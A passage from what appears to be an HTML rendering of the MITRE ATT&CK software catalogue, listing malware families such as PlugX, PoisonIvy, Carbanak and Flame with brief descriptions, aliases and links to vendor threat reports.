<div class="paragraph">
<p>PlugX is a remote access tool (RAT) that uses modular plugins. (Citation: Lastline PlugX Analysis) It has been used by multiple threat groups. (Citation: FireEye Clandestine Fox Part 2) (Citation: New DragonOK) (Citation: Dell TG-3390)</p>
</div>
<div class="paragraph">
<p>Aliases: PlugX, Sogu, Kaba</p>
</div>
<div class="paragraph">
<p>PlugX - S0013 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>PlugX</p>
</li>
<li>
<p>Sogu</p>
</li>
<li>
<p>Kaba</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1007. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0013">https://attack.mitre.org/wiki/Software/S0013</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://labs.lastline.com/an-analysis-of-plugx">http://labs.lastline.com/an-analysis-of-plugx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html">https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/">http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/">http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_reaver_s0172"><a class="anchor" href="#_reaver_s0172"></a><a class="link" href="#_reaver_s0172">Reaver - S0172</a></h3>
<div class="paragraph">
<p>is a malware family that has been in the wild since at least late 2016. Reporting indicates victims have primarily been associated with the "Five Poisons," which are movements the Chinese government considers dangerous. The malware is unique due to its final payload being in the form of a Control panel item. (Citation: Palo Alto Reaver Nov 2017)</p>
</div>
<div class="paragraph">
<p>Aliases: Reaver</p>
</div>
<div class="paragraph">
<p>Reaver - S0172 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Reaver</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1008. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0172">https://attack.mitre.org/wiki/Software/S0172</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/">https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_misdat_s0083"><a class="anchor" href="#_misdat_s0083"></a><a class="link" href="#_misdat_s0083">Misdat - S0083</a></h3>
<div class="paragraph">
<p>Misdat is a backdoor that was used by Dust Storm from 2010 to 2011. (Citation: Cylance Dust Storm)</p>
</div>
<div class="paragraph">
<p>Aliases: Misdat</p>
</div>
<div class="paragraph">
<p>Misdat - S0083 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Misdat</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1009. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0083">https://attack.mitre.org/wiki/Software/S0083</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cylance.com/content/dam/cylance/pdfs/reports/Op%20Dust%20Storm%20Report.pdf">https://www.cylance.com/content/dam/cylance/pdfs/reports/Op%20Dust%20Storm%20Report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_komplex_s0162"><a class="anchor" href="#_komplex_s0162"></a><a class="link" href="#_komplex_s0162">Komplex - S0162</a></h3>
<div class="paragraph">
<p>Komplex is a backdoor that has been used by APT28 on OS X and appears to be developed in a similar manner to (Citation: XAgentOSX) (Citation: XAgentOSX) (Citation: Sofacy Komplex Trojan).</p>
</div>
<div class="paragraph">
<p>Aliases: Komplex</p>
</div>
<div class="paragraph">
<p>Komplex - S0162 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Komplex</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1010. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0162">https://attack.mitre.org/wiki/Software/S0162</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/">https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/">https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_taidoor_s0011"><a class="anchor" href="#_taidoor_s0011"></a><a class="link" href="#_taidoor_s0011">Taidoor - S0011</a></h3>
<div class="paragraph">
<p>Taidoor is malware that has been used since at least 2010, primarily to target Taiwanese government organizations. (Citation: TrendMicro Taidoor)</p>
</div>
<div class="paragraph">
<p>Aliases: Taidoor</p>
</div>
<div class="paragraph">
<p>Taidoor - S0011 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Taidoor</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1011. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0011">https://attack.mitre.org/wiki/Software/S0011</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp%20the%20taidoor%20campaign.pdf">http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp%20the%20taidoor%20campaign.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_moonwind_s0149"><a class="anchor" href="#_moonwind_s0149"></a><a class="link" href="#_moonwind_s0149">MoonWind - S0149</a></h3>
<div class="paragraph">
<p>MoonWind is a remote access tool (RAT) that was used in 2016 to target organizations in Thailand. (Citation: Palo Alto MoonWind March 2017)</p>
</div>
<div class="paragraph">
<p>Aliases: MoonWind</p>
</div>
<div class="paragraph">
<p>MoonWind - S0149 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>MoonWind</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1012. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0149">https://attack.mitre.org/wiki/Software/S0149</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/">http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_crimson_s0115"><a class="anchor" href="#_crimson_s0115"></a><a class="link" href="#_crimson_s0115">Crimson - S0115</a></h3>
<div class="paragraph">
<p>Crimson is malware used as part of a campaign known as Operation Transparent Tribe that targeted Indian diplomatic and military victims. (Citation: Proofpoint Operation Transparent Tribe March 2016)</p>
</div>
<div class="paragraph">
<p>Aliases: Crimson, MSIL/Crimson</p>
</div>
<div class="paragraph">
<p>Crimson - S0115 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Crimson</p>
</li>
<li>
<p>MSIL/Crimson</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1013. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0115">https://attack.mitre.org/wiki/Software/S0115</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf">https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rover_s0090"><a class="anchor" href="#_rover_s0090"></a><a class="link" href="#_rover_s0090">Rover - S0090</a></h3>
<div class="paragraph">
<p>Rover is malware suspected of being used for espionage purposes. It was used in 2015 in a targeted email sent to an Indian Ambassador to Afghanistan. (Citation: Palo Alto Rover)</p>
</div>
<div class="paragraph">
<p>Aliases: Rover</p>
</div>
<div class="paragraph">
<p>Rover - S0090 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Rover</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1014. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0090">https://attack.mitre.org/wiki/Software/S0090</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/">http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zlib_s0086"><a class="anchor" href="#_zlib_s0086"></a><a class="link" href="#_zlib_s0086">ZLib - S0086</a></h3>
<div class="paragraph">
<p>ZLib is a full-featured backdoor that was used as a second-stage implant by Dust Storm from 2014 to 2015. It is malware and should not be confused with the compression library from which its name is derived. (Citation: Cylance Dust Storm)</p>
</div>
<div class="paragraph">
<p>Aliases: ZLib</p>
</div>
<div class="paragraph">
<p>ZLib - S0086 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>ZLib</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1015. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0086">https://attack.mitre.org/wiki/Software/S0086</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cylance.com/content/dam/cylance/pdfs/reports/Op%20Dust%20Storm%20Report.pdf">https://www.cylance.com/content/dam/cylance/pdfs/reports/Op%20Dust%20Storm%20Report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_powerduke_s0139"><a class="anchor" href="#_powerduke_s0139"></a><a class="link" href="#_powerduke_s0139">PowerDuke - S0139</a></h3>
<div class="paragraph">
<p>PowerDuke is a backdoor that was used by APT29 in 2016. It has primarily been delivered through Microsoft Word or Excel attachments containing malicious macros. (Citation: Volexity PowerDuke November 2016)</p>
</div>
<div class="paragraph">
<p>Aliases: PowerDuke</p>
</div>
<div class="paragraph">
<p>PowerDuke - S0139 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>PowerDuke</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1016. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0139">https://attack.mitre.org/wiki/Software/S0139</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/">https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_httpbrowser_s0070"><a class="anchor" href="#_httpbrowser_s0070"></a><a class="link" href="#_httpbrowser_s0070">HTTPBrowser - S0070</a></h3>
<div class="paragraph">
<p>HTTPBrowser is malware that has been used by several threat groups. (Citation: ThreatStream Evasion Analysis) (Citation: Dell TG-3390) It is believed to be of Chinese origin. (Citation: ThreatConnect Anthem)</p>
</div>
<div class="paragraph">
<p>Aliases: HTTPBrowser, Token Control, HttpDump</p>
</div>
<div class="paragraph">
<p>HTTPBrowser - S0070 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>HTTPBrowser</p>
</li>
<li>
<p>Token Control</p>
</li>
<li>
<p>HttpDump</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1017. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0070">https://attack.mitre.org/wiki/Software/S0070</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop">https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/">http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/">https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hammertoss_s0037"><a class="anchor" href="#_hammertoss_s0037"></a><a class="link" href="#_hammertoss_s0037">HAMMERTOSS - S0037</a></h3>
<div class="paragraph">
<p>HAMMERTOSS is a backdoor that was used by APT29 in 2015. (Citation: FireEye APT29) (Citation: F-Secure The Dukes)</p>
</div>
<div class="paragraph">
<p>Aliases: HAMMERTOSS, HammerDuke, NetDuke</p>
</div>
<div class="paragraph">
<p>HAMMERTOSS - S0037 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>HAMMERTOSS</p>
</li>
<li>
<p>HammerDuke</p>
</li>
<li>
<p>NetDuke</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1018. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0037">https://attack.mitre.org/wiki/Software/S0037</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf">https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_poisonivy_s0012"><a class="anchor" href="#_poisonivy_s0012"></a><a class="link" href="#_poisonivy_s0012">PoisonIvy - S0012</a></h3>
<div class="paragraph">
<p>PoisonIvy is a popular remote access tool (RAT) that has been used by many groups. (Citation: FireEye Poison Ivy)</p>
</div>
<div class="paragraph">
<p>Aliases: PoisonIvy, Poison Ivy</p>
</div>
<div class="paragraph">
<p>PoisonIvy - S0012 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>PoisonIvy</p>
</li>
<li>
<p>Poison Ivy</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1019. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0012">https://attack.mitre.org/wiki/Software/S0012</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_carbanak_s0030"><a class="anchor" href="#_carbanak_s0030"></a><a class="link" href="#_carbanak_s0030">Carbanak - S0030</a></h3>
<div class="paragraph">
<p>Carbanak is a remote backdoor used by a group of the same name (Carbanak). It is intended for espionage, data exfiltration, and providing remote access to infected machines. (Citation: Kaspersky Carbanak)</p>
</div>
<div class="paragraph">
<p>Aliases: Carbanak, Anunak</p>
</div>
<div class="paragraph">
<p>Carbanak - S0030 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Carbanak</p>
</li>
<li>
<p>Anunak</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1020. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0030">https://attack.mitre.org/wiki/Software/S0030</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/files/2015/02/Carbanak%20APT%20eng.pdf">https://securelist.com/files/2015/02/Carbanak%20APT%20eng.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ixeshe_s0015"><a class="anchor" href="#_ixeshe_s0015"></a><a class="link" href="#_ixeshe_s0015">Ixeshe - S0015</a></h3>
<div class="paragraph">
<p>Ixeshe is a malware family that has been used since 2009 to attack targets in East Asia. (Citation: Moran 2013)</p>
</div>
<div class="paragraph">
<p>Aliases: Ixeshe</p>
</div>
<div class="paragraph">
<p>Ixeshe - S0015 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Ixeshe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1021. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0015">https://attack.mitre.org/wiki/Software/S0015</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html">https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_badnews_s0128"><a class="anchor" href="#_badnews_s0128"></a><a class="link" href="#_badnews_s0128">BADNEWS - S0128</a></h3>
<div class="paragraph">
<p>BADNEWS is malware that has been used by the actors responsible for the MONSOON campaign. Its name was given due to its use of RSS feeds, forums, and blogs for command and control. (Citation: Forcepoint Monsoon)</p>
</div>
<div class="paragraph">
<p>Aliases: BADNEWS</p>
</div>
<div class="paragraph">
<p>BADNEWS - S0128 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>BADNEWS</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1022. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0128">https://attack.mitre.org/wiki/Software/S0128</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf">https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_flipside_s0173"><a class="anchor" href="#_flipside_s0173"></a><a class="link" href="#_flipside_s0173">FLIPSIDE - S0173</a></h3>
<div class="paragraph">
<p>is a simple tool similar to Plink that is used by FIN5 to maintain access to victims. (Citation: Mandiant FIN5 GrrCON Oct 2016)</p>
</div>
<div class="paragraph">
<p>Aliases: FLIPSIDE</p>
</div>
<div class="paragraph">
<p>FLIPSIDE - S0173 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FLIPSIDE</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1023. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0173">https://attack.mitre.org/wiki/Software/S0173</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.youtube.com/watch?v=fevGZs0EQu8">https://www.youtube.com/watch?v=fevGZs0EQu8</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_flame_s0143"><a class="anchor" href="#_flame_s0143"></a><a class="link" href="#_flame_s0143">Flame - S0143</a></h3>
<div class="paragraph">
<p>Flame is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. (Citation: Kaspersky Flame)</p>
</div>
<div class="paragraph">
<p>Aliases: Flame, Flamer, sKyWIper</p>
</div>
<div class="paragraph">
<p>Flame - S0143 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Flame</p>
</li>
<li>
<p>Flamer</p>
</li>
<li>
<p>sKyWIper</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1024. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0143">https://attack.mitre.org/wiki/Software/S0143</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/the-flame-questions-and-answers-51/34344/">https://securelist.com/the-flame-questions-and-answers-51/34344/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_riptide_s0003"><a class="anchor" href="#_riptide_s0003"></a><a class="link" href="#_riptide_s0003">RIPTIDE - S0003</a></h3>
<div class="paragraph">
<p>RIPTIDE is a proxy-aware backdoor used by APT12. (Citation: Moran 2014)</p>
</div>
<div class="paragraph">
<p>Aliases: RIPTIDE</p>
</div>
<div class="paragraph">
<p>RIPTIDE - S0003 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>RIPTIDE</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1025. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0003">https://attack.mitre.org/wiki/Software/S0003</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html">https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_daserf_s0187"><a class="anchor" href="#_daserf_s0187"></a><a class="link" href="#_daserf_s0187">Daserf - S0187</a></h3>
<div class="paragraph">
<p>Daserf is a backdoor that has been used to spy on and steal from Japanese, South Korean, Russian, Singaporean, and Chinese victims. Researchers have identified versions written in both Visual C and Delphi. (Citation: Trend Micro Daserf Nov 2017) (Citation: Secureworks BRONZE BUTLER Oct 2017)</p>
</div>
<div class="paragraph">
<p>Aliases: Daserf, Muirim, Nioupale</p>
</div>
<div class="paragraph">
<p>Daserf - S0187 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Daserf</p>
</li>
<li>
<p>Muirim</p>
</li>
<li>
<p>Nioupale</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1026. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0187">https://attack.mitre.org/wiki/Software/S0187</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/">http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses">https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cozycar_s0046"><a class="anchor" href="#_cozycar_s0046"></a><a class="link" href="#_cozycar_s0046">CozyCar - S0046</a></h3>
<div class="paragraph">
<p>CozyCar is malware that was used by APT29 from 2010 to 2015. It is a modular malware platform, and its backdoor component can be instructed to download and execute a variety of modules with different functionality. (Citation: F-Secure The Dukes)</p>
</div>
<div class="paragraph">
<p>Aliases: CozyCar, CozyDuke, CozyBear, Cozer, EuroAPT</p>
</div>
<div class="paragraph">
<p>CozyCar - S0046 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>CozyCar</p>
</li>
<li>
<p>CozyDuke</p>
</li>
<li>
<p>CozyBear</p>
</li>
<li>
<p>Cozer</p>
</li>
<li>
<p>EuroAPT</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1027. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0046">https://attack.mitre.org/wiki/Software/S0046</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf">https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf</a></p></td>
</tr>
